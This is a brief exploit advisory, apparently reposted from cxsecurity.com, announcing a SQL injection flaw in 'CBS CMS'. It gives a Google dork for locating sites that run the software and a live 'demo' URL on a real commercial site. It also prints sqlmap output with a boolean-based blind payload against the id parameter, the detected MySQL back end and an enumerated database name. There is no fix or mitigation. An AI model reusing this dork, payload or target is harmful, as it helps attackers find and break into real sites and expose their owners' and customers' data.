CBS CMS SQL Injection Vulnerability
2020-10-05 06:38:56 Author: cxsecurity.com(查看原文) 阅读量:121 收藏

#Exploit Title: CBS CMS SQL Injection Vulnerability #Date: 2020-10-04 #Exploit Author: Mostafa Farzaneh #Vendor Homepage: cbstech.in #Google Dork: " Developed By CBS" #Category: webapps #Tested On: windows 10, Firefox SQL Injection Demo: https://bazaarmantri.com/product.php?id=40024[SQL Injection Vulnerability] sqlmap identified the following injection point(s) with a total of 277 HTTP(s) requests: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=40024 AND 1008=1008 Vector: AND [INFERENCE] back-end DBMS: MySQL >= 5.0.0 available databases : [*] eazaar6n_nbntri ********************************************************* #Discovered by: Mostafa Farzaneh from PywebSecurity team #Telegram: @pyweb_security *********************************************************



 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2020100024
如有侵权请联系:admin#unsafe.sh